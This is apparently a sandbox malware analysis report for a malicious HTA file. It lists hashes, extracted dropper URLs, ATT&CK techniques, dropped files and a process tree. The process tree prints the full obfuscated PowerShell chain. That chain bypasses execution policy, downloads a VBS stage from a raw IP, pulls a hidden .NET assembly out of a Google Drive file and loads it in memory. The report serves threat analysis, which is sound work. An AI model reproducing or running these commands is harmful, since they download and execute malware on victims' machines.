98423a9f9031d55d618d2b6247e6724a96264cc7f10a20fb35ee475fada464c7

General

Target

goodthingstoapprovethebestwaytounderstandhowmuchgood.hta
Size

131KB
MD5

c8cbdfd8a9cde5597983e48f8a9dff18
SHA1

df42a953a8f67e4bc41d8cb1cc9a707bd358617c
SHA256

98423a9f9031d55d618d2b6247e6724a96264cc7f10a20fb35ee475fada464c7
SHA512

18a54603e30fa03c6f6671a0d47eb7fe9942f7aefc038649222aa204561a3c50fe775c2c83c4d240757ef82fcbdaa4c86c8fe1e249c30abdd6bc76b16a8b4587
SSDEEP

96:4vCt7Qm6c4rJAcUJrH6FE4/JCgfXjaPW8/85ScHtcYggzZbrUZcKqQ:4vCF3KrJ2rg3Ugy6rDQ

Score

10^/10

defense_evasion discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

exe.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

Signatures

Blocklisted process makes network request 3 IoCs

Processes:

poWERsHELl.eXepowershell.exe

flow pid process

4 2636 poWERsHELl.eXe
6 1808 powershell.exe
8 1808 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exe

pid process

1656 powershell.exe
1808 powershell.exe
Evasion via Device Credential Deployment 2 IoCs
defense_evasion execution

Processes:

powershell.exepoWERsHELl.eXe

pid process

2840 powershell.exe
2636 poWERsHELl.eXe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

5 drive.google.com
6 drive.google.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

flow	pid	process
4	2636	poWERsHELl.eXe
6	1808	powershell.exe
8	1808	powershell.exe

pid	process
1656	powershell.exe
1808	powershell.exe

pid	process
2840	powershell.exe
2636	poWERsHELl.eXe

flow	ioc
5	drive.google.com
6	drive.google.com

System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

powershell.exemshta.exepoWERsHELl.eXepowershell.execsc.execvtres.exeWScript.exepowershell.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	poWERsHELl.eXe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs
adware spyware

Modify Registry
T1112

Processes:

mshta.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main mshta.exe
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

poWERsHELl.eXepowershell.exepowershell.exepowershell.exe

pid process

2636 poWERsHELl.eXe
2840 powershell.exe
2636 poWERsHELl.eXe
2636 poWERsHELl.eXe
1656 powershell.exe
1808 powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

pid	process
2636	poWERsHELl.eXe
2840	powershell.exe
2636	poWERsHELl.eXe
2636	poWERsHELl.eXe
1656	powershell.exe
1808	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

poWERsHELl.eXepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2636	poWERsHELl.eXe
Token: SeDebugPrivilege	2840	powershell.exe
Token: SeDebugPrivilege	1656	powershell.exe
Token: SeDebugPrivilege	1808	powershell.exe

Suspicious use of WriteProcessMemory 28 IoCs

Processes:

mshta.exepoWERsHELl.eXecsc.exeWScript.exepowershell.exe

description	pid	process	target process
PID 2404 wrote to memory of 2636	2404	mshta.exe	poWERsHELl.eXe
PID 2404 wrote to memory of 2636	2404	mshta.exe	poWERsHELl.eXe
PID 2404 wrote to memory of 2636	2404	mshta.exe	poWERsHELl.eXe
PID 2404 wrote to memory of 2636	2404	mshta.exe	poWERsHELl.eXe
PID 2636 wrote to memory of 2840	2636	poWERsHELl.eXe	powershell.exe
PID 2636 wrote to memory of 2840	2636	poWERsHELl.eXe	powershell.exe
PID 2636 wrote to memory of 2840	2636	poWERsHELl.eXe	powershell.exe
PID 2636 wrote to memory of 2840	2636	poWERsHELl.eXe	powershell.exe
PID 2636 wrote to memory of 2864	2636	poWERsHELl.eXe	csc.exe
PID 2636 wrote to memory of 2864	2636	poWERsHELl.eXe	csc.exe
PID 2636 wrote to memory of 2864	2636	poWERsHELl.eXe	csc.exe
PID 2636 wrote to memory of 2864	2636	poWERsHELl.eXe	csc.exe
PID 2864 wrote to memory of 2148	2864	csc.exe	cvtres.exe
PID 2864 wrote to memory of 2148	2864	csc.exe	cvtres.exe
PID 2864 wrote to memory of 2148	2864	csc.exe	cvtres.exe
PID 2864 wrote to memory of 2148	2864	csc.exe	cvtres.exe
PID 2636 wrote to memory of 2364	2636	poWERsHELl.eXe	WScript.exe
PID 2636 wrote to memory of 2364	2636	poWERsHELl.eXe	WScript.exe
PID 2636 wrote to memory of 2364	2636	poWERsHELl.eXe	WScript.exe
PID 2636 wrote to memory of 2364	2636	poWERsHELl.eXe	WScript.exe
PID 2364 wrote to memory of 1656	2364	WScript.exe	powershell.exe
PID 2364 wrote to memory of 1656	2364	WScript.exe	powershell.exe
PID 2364 wrote to memory of 1656	2364	WScript.exe	powershell.exe
PID 2364 wrote to memory of 1656	2364	WScript.exe	powershell.exe
PID 1656 wrote to memory of 1808	1656	powershell.exe	powershell.exe
PID 1656 wrote to memory of 1808	1656	powershell.exe	powershell.exe
PID 1656 wrote to memory of 1808	1656	powershell.exe	powershell.exe
PID 1656 wrote to memory of 1808	1656	powershell.exe	powershell.exe

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\goodthingstoapprovethebestwaytounderstandhowmuchgood.hta"
1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2404
- C:\Windows\SysWOW64\WindowSpOwERshelL\v1.0\poWERsHELl.eXe
  "C:\Windows\SystEm32\WindowSpOwERshelL\v1.0\poWERsHELl.eXe" "POwersHell -EX bYPaSs -nop -W 1 -C DEVicECRedENtiAlDepLOyMEnT ; iex($(iEx('[sYsTeM.teXt.ENCOdinG]'+[ChaR]0X3a+[chAr]58+'UTF8.gETsTrINg([sySteM.cONVErt]'+[ChAr]58+[chaR]58+'fRombaSe64STRiNg('+[cHAr]0x22+'JDBjWklXOXhNdFR4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFUkRFRmluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWklDaFJKY2l4a04sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHIsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZ4a0dZZERlZnIsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJd3NkLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCb1JuKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJVc1hUUWciICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lc1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnFreiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQwY1pJVzl4TXRUeDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTU1LzMxMi91dGhpbmtpYW10aGVnb29kdGhpbmdzZm9ydWdpdmVubWViZXN0dGhpbmdzdG9kb3dpdGhtZS50SUYiLCIkRU52OkFQUERBVEFcdXRoaW5raWFtdGhlZ29vZHRoaW5nc2ZvcnVnaXZlbm1lYmVzdHRoaW5nc3RvZC52YlMiLDAsMCk7U1RBUnQtc0xlZXAoMyk7c1RhUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVx1dGhpbmtpYW10aGVnb29kdGhpbmdzZm9ydWdpdmVubWViZXN0dGhpbmdzdG9kLnZiUyI='+[ChAr]0X22+'))')))"
  2⤵
  - Blocklisted process makes network request
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2636
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYPaSs -nop -W 1 -C DEVicECRedENtiAlDepLOyMEnT
    3⤵
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2840
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vx5j-siy.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2864
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9D88.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC9D87.tmp"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2148
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\uthinkiamthegoodthingsforugivenmebestthingstod.vbS"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2364
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnN3ZZaW1hZ2VVcmwgPSB3MlBodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciB3MlA7N3ZZd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlJysnYkNsaWVudDs3dllpbWFnZUJ5dGVzID0gN3ZZd2ViQ2xpZW50LkRvd25sb2FkRGF0YSg3dllpbWFnZVVybCk7N3ZZJysnaW1hJysnZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcnKycoN3ZZaW1hZ2VCeXRlcyk7N3ZZc3RhcnQnKydGbGFnID0gdzJQPDxCQVNFNjRfU1RBUlQ+PncyUDsnKyc3dlllbmRGbGFnID0gdzJQPDxCQVNFJysnNjRfRU5EPj53MlA7N3ZZc3RhcnRJbmRleCA9IDd2WWltYWdlVGV4dC5JbmRleE9mKDd2WXN0YXJ0RmxhJysnZyk7N3ZZZW5kSW5kZXggPSA3dllpbWFnZVRleHQuSW5kZXhPZig3dlllbmRGbGFnKTs3dllzdGFydEluZGV4IC1nZSAwIC1hbmQgN3ZZZW5kSW5kZXggLWd0IDd2WXN0YXJ0SW5kZXg7N3ZZc3RhcnRJbicrJ2RleCArPSA3dllzdGFydEZsYWcuTGVuJysnZ3QnKydoOzd2WWJhc2U2NExlbmd0aCA9IDd2WWVuZEluZGV4IC0gN3ZZc3RhcnRJbmRleDs3dlliYXNlNjRDb21tYW5kID0gN3ZZaW1hZ2VUZXh0LlN1YnN0cmluZyg3dllzdGFydEluZGV4LCA3dlliYXNlNjRMZW5ndGgpOzd2WWJhc2U2NFJldmVyc2VkID0gLWpvaW4gKDd2WWJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBqR3cgRm9yRWFjaC1PYmplY3QgeyA3dllfIH0pWy0xLi4tKDd2WWJhc2U2NENvbW1hbmQuTGVuZ3RoKV07N3ZZY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5DbycrJ252ZXJ0XTo6RicrJ3JvbUJhc2U2NFN0JysncmluZyg3dlliYXNlNjRSZXZlcnNlZCk7N3ZZbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1iJysnbHldOjpMb2FkKDd2WWNvbW1hJysnbmRCeXRlcyk7N3ZZdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCh3MlBWQUl3MlApOzd2WXZhaU1ldGhvJysnZC5JbnZva2UoN3ZZbnVsbCwgQCh3MlB0eHQuU0dPTEtMLzIxMy81NTEuODcxLjY0Ljg5MS8vOnB0dGh3MlAsIHcyJysnUGRlc2F0aXZhZG93MlAsIHcyUGRlc2F0aXZhZG93MlAsIHcyUGRlJysnc2F0aXZhZG93MlAsJysnIHcyUGFzcG5ldF9yZWdiJysncm93c2Vyc3cyUCwgdzJQZGVzYXRpdmFkb3cyUCwgdzJQZGVzYXRpdmFkb3cyUCx3MlBkZXNhdGl2YWRvdzJQLHcyUGRlc2F0aXZhZG93MlAsdzJQZGVzJysnYXRpdmFkb3cyUCx3MlBkZXNhdGl2YWRvdzJQLHcyUGRlc2EnKyd0aXYnKydhZG93JysnMlAsdzJQMXcyUCx3MlBkZXNhdGl2YWRvdzJQKSk7JykgLUNyRVBsQWNlKFtjSGFSXTExOStbY0hhUl01MCtbY0hhUl04MCksW2NIYVJdMzkgLXJFcGxBY2UgICc3dlknLFtjSGFSXTM2LXJFcGxBY2Unakd3JyxbY0hhUl0xMjQpIHwgJiAoICRwc0hvTUVbMjFdKyRwc0hvTUVbMzBdKydYJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1656
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('7vYimageUrl = w2Phttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur w2P;7vYwebClient = New-Object System.Net.We'+'bClient;7vYimageBytes = 7vYwebClient.DownloadData(7vYimageUrl);7vY'+'ima'+'geText = [System.Text.Encoding]::UTF8.GetString'+'(7vYimageBytes);7vYstart'+'Flag = w2P<<BASE64_START>>w2P;'+'7vYendFlag = w2P<<BASE'+'64_END>>w2P;7vYstartIndex = 7vYimageText.IndexOf(7vYstartFla'+'g);7vYendIndex = 7vYimageText.IndexOf(7vYendFlag);7vYstartIndex -ge 0 -and 7vYendIndex -gt 7vYstartIndex;7vYstartIn'+'dex += 7vYstartFlag.Len'+'gt'+'h;7vYbase64Length = 7vYendIndex - 7vYstartIndex;7vYbase64Command = 7vYimageText.Substring(7vYstartIndex, 7vYbase64Length);7vYbase64Reversed = -join (7vYbase64Command.ToCharArray() jGw ForEach-Object { 7vY_ })[-1..-(7vYbase64Command.Length)];7vYcommandBytes = [System.Co'+'nvert]::F'+'romBase64St'+'ring(7vYbase64Reversed);7vYloadedAssembly = [System.Reflection.Assemb'+'ly]::Load(7vYcomma'+'ndBytes);7vYvaiMethod = [dnlib.IO.Home].GetMethod(w2PVAIw2P);7vYvaiMetho'+'d.Invoke(7vYnull, @(w2Ptxt.SGOLKL/213/551.871.64.891//:ptthw2P, w2'+'Pdesativadow2P, w2Pdesativadow2P, w2Pde'+'sativadow2P,'+' w2Paspnet_regb'+'rowsersw2P, w2Pdesativadow2P, w2Pdesativadow2P,w2Pdesativadow2P,w2Pdesativadow2P,w2Pdes'+'ativadow2P,w2Pdesativadow2P,w2Pdesa'+'tiv'+'adow'+'2P,w2P1w2P,w2Pdesativadow2P));') -CrEPlAce([cHaR]119+[cHaR]50+[cHaR]80),[cHaR]39 -rEplAce '7vY',[cHaR]36-rEplAce'jGw',[cHaR]124) | & ( $psHoME[21]+$psHoME[30]+'X')"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1808

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES9D88.tmp

Filesize
1KB

MD5
0b1fd9e4c86c5f141e9449edff21ce12

SHA1
d1597a773ac4ba74a129fa6acd381da1ed3224ce

SHA256
cc404d76d0acc09031ee8826f696419e3290aa27e70656e360d3cb9c52fe8cba

SHA512
d5b840e207dc5dcd0e075201afcbc40df32f62fe20a73d44237c43f9623aef1fc9f6ac48a33742dc0af1e311e573432132cbffa52bd36b69c4bdab628d6d4a3a

Download Submit
C:\Users\Admin\AppData\Local\Temp\vx5j-siy.dll

Filesize
3KB

MD5
7370dcbc7e717e9c64508d8d993c7b47

SHA1
a8e5b21b31523b1c5c86ae5e6f84de45173bed40

SHA256
0d8e4d49734d480ce326d660971e9c9cec54d794c75b5398422e3dc6852f0308

SHA512
54ff4a6962f03e0b58f32d3c8e0ceaa29027cc91329ba73fb1579f64c031e7bde7268096ba6e56a0fe40e736f4ece780d0cef6eff1f923a67af612ee6fc9a74d

Download Submit
C:\Users\Admin\AppData\Local\Temp\vx5j-siy.pdb

Filesize
7KB

MD5
a069cf4f1772adcbb38a9c660347f1c6

SHA1
ad756907b66dcec9bec93aac8689180aa074fb98

SHA256
663e215a90f1e5cfdb2b55e7d52e42f6b405a801e9347ad8b01f81fa921ddbf6

SHA512
06856b0679385509ca4aa511a941ee0c287af90424922c2468c22a1b06ebef13b7ca6ef678b5a00c5ae5ac9715d3dcba707f7846709f78f7f01e75594d4c771e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
cd52653f65562d127287134a6443a415

SHA1
d1e472b22a6a6882a76614adf53c9842960867e7

SHA256
d87cbb79cfa05e00b6e2f9308b8fddca3b8cb800e2ae3c413e791b1dedec81dc

SHA512
2655677b3355cfac99c004b746eb06f0cd97b9d20a4a765e24b39f6c82633c5ba64ce19763206eff54ae4feaf8f7787dc7ef1891d4d6d68572c16cc54ee2887c

Download Submit
C:\Users\Admin\AppData\Roaming\uthinkiamthegoodthingsforugivenmebestthingstod.vbS

Filesize
136KB

MD5
f1580330671ef5f9f2c0525092a52a1e

SHA1
e22a52d31f506f4b23fffdf438b2a87c630520d3

SHA256
aa9e57ff6fa9792bc9f8bd02acbd5d248f2e6e361e0516a8972265a90002ed6b

SHA512
940477c296ff67079eaed9cf0a0e894450b919e6d8416e7bc0b8c0031c8c16d5ad1d9a4757d17627cc9f2ceb331f0f432e78d8621497fcf2085e37ea39ca6fa3

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC9D87.tmp

Filesize
652B

MD5
0cb40b83b844a46c039506d557c84b09

SHA1
068fee6cdbbb26790e30c7618f2c1e3822c50e12

SHA256
5f18d558edba7d72aafb949a45b37ed5b23161c64583bc10d3588cefcde0be3f

SHA512
334c9f513fddd3818170c960f8ba9f8e1745ce9a37284c3407745da014b444bf76d87101f955228d88943d3d5d790a59545da0f1f11f13f8eed5c64ff5cdaad5

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\vx5j-siy.0.cs

Filesize
461B

MD5
47833bec615200eabb6b94b9402215d9

SHA1
0d09d6af10eb9d2eaa1f0b3083d7417715634610

SHA256
ca55753945475d20ea711d447df602805205d08d77f7fb3495b85e90cb759e02

SHA512
f94e3794f1efd72a4dd88ffa98f4be25b165281f5184e31522995e683b6b17ae4c898127927e7ec257d3794405c560e7b1e5d9c941c88e6a79c95cef794ceeb4

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\vx5j-siy.cmdline

Filesize
309B

MD5
6e4996f91ee6770f4f6eeefebbcf50b5

SHA1
8b467e6a103a3e3fbad483ce6149a5a092e4b049

SHA256
450e8d63f68dd61c6443662e6ea595247ac60e051a6bee7973e95c51ecdc2345

SHA512
0bb148ecbcd94c4b01a5630794b3e1c35b3fdba5b1c314632f367b09aef76c9645f7f41b9319e56eacc91baeb0452ca9ab29d014cd371a415ca5d37d6dc5e755

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads